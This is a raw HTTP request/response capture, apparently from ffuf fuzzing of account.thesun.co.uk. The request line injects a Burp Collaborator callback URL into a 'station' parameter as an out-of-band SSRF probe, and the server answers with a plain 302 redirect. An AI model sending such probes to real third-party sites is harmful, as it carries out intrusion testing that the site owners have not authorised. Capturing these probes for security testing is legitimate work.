GET /?station=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net HTTP/1.1
Host: account.thesun.co.uk
User-Agent: Fuzz Faster U Fool v1.2.0-git
Accept-Encoding: gzip


---- ↑ Request ---- Response ↓ ----

HTTP/1.1 302 Found
Content-Length: 43
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-transform
Cf-Cache-Status: DYNAMIC
Cf-Ray: 64142acbbb8c179b-SIN
Cf-Request-Id: 09807913520000179b3f88d000000001
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Date: Sat, 17 Apr 2021 08:08:44 GMT
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Location: https://thesun.co.uk/
Ot-Baggage-Auth0-Request-Id: 64142acbbb8c179b
Ot-Tracer-Sampled: true
Ot-Tracer-Spanid: 045006411f031135
Ot-Tracer-Traceid: 59d79eb57d7c3b1c
Server: cloudflare
Set-Cookie: __cfduid=d0b11a90a3ae0a30ce2f4ecb34dbbd4fa1618646924; expires=Mon, 17-May-21 08:08:44 GMT; path=/; domain=.account.thesun.co.uk; HttpOnly; SameSite=Lax; Secure
Strict-Transport-Security: max-age=31536000
Vary: Accept, Accept-Encoding
X-Auth0-Requestid: e2737402b797c3e199a3
X-Content-Type-Options: nosniff

Found. Redirecting to https://thesun.co.uk/